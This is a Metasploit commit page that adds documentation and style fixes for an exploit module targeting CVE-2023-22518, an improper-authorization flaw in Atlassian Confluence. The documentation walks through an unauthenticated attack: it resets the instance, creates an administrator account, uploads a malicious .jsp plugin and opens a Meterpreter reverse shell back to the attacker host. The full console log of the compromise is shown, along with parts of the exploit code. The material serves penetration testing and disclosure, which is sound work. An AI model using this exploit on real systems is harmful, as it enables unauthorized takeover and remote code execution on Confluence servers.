Skip to content

Commit

Permalink
Documentation and rubocop changes
Browse files Browse the repository at this point in the history
  • Loading branch information
@jheysel-r7
jheysel-r7 committed Dec 12, 2023
1 parent 61414fa commit 862194d
Show file tree
Hide file tree
Showing 3 changed files with 121 additions and 13 deletions.
108 changes: 108 additions & 0 deletions documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
## Vulnerable Application

This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.

### Setup
Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
8.5.1 running on Windows Server 2022.

After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required
to obtain the trial licence. A database and a will also be required to run Confluence. Download and install
[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB
credentials, the default PostgreSQL database can be used.

## Verification Steps

1. Start msfconsole
1. Do: `use atlassian_confluence_unauth_backup`
1. Set the `RHOST`
1. Run the module
1. Receive a Meterpreter session in the context of the user running the Confluence application.

## Options

### CONFLUENCE_TARGET_ENDPOINT

This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows:
- /json/setup-restore.action
- /json/setup-restore-local.action
- /json/setup-restore-progress.action'

### CONFLUENCE_PLUGIN_TIMEOUT

The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
and we must poll the server to find out when installation has completed. This option governs the maximum amount
of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.

## Scenarios
### Windows Server 2022 running Atlassian Confluence 8.5.1
```
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true
verbose => true
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options
Module options (exploit/multi/http/atlassian_confluence_unauth_backup):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin
CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action)
NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges
NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8090 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
[*] Setting credentials: candace.leffler:LELTtnOG
[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG'
[*] Generating payload plugin
[*] Uploading payload plugin
[*] Triggering payload plugin
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 172.16.199.134
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500
meterpreter > getuid
Server username: WIN-2EEL7BRDUD8$
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows Server 2022 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
```
2 changes: 1 addition & 1 deletion lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -123,7 +123,7 @@ def trigger_payload_plugin(payload_endpoint)
end

def delete_payload_plugin(plugin_key, payload_endpoint, admin_username, admin_password)
print_status('Deleting plugin...')
vprint_status('Deleting plugin...')

res = send_request_cgi(
'method' => 'DELETE',
Expand Down
24 changes: 12 additions & 12 deletions modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,13 +16,13 @@ def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence Unauth JSON setup-restore RCE',
'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)',
'Description' => %q{
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
},
'Author' => [
'Atlassian', # Discovery
Expand Down Expand Up @@ -58,7 +58,7 @@ def initialize(info = {})
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
# The endpoint we target to trigger the vulnerability.
OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action','/json/setup-restore-local.action','/json/setup-restore-progress.action']]),
OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]),
# We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
]
Expand All @@ -70,9 +70,9 @@ def check

# Confluence Serer and Confluence Data Center have the same vulnerable version ranges.
if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||
confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end

Expand Down Expand Up @@ -123,7 +123,7 @@ def upload_backup
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'keep_cookies' => true,
'headers' => {
'X-Atlassian-Token' => 'no-check',
'X-Atlassian-Token' => 'no-check'
},
'vars_get' => {
'synchronous' => 'true'
Expand All @@ -140,7 +140,7 @@ def exploit
# Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password
upload_backup

# Now with admin access, upload a .jsp plugin to gain RCE on the target system.
# Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system.
payload_endpoint = rand_text_alphanumeric(8)
plugin_key = rand_text_alpha(8)
begin
Expand Down

0 comments on commit 862194d

Please sign in to comment.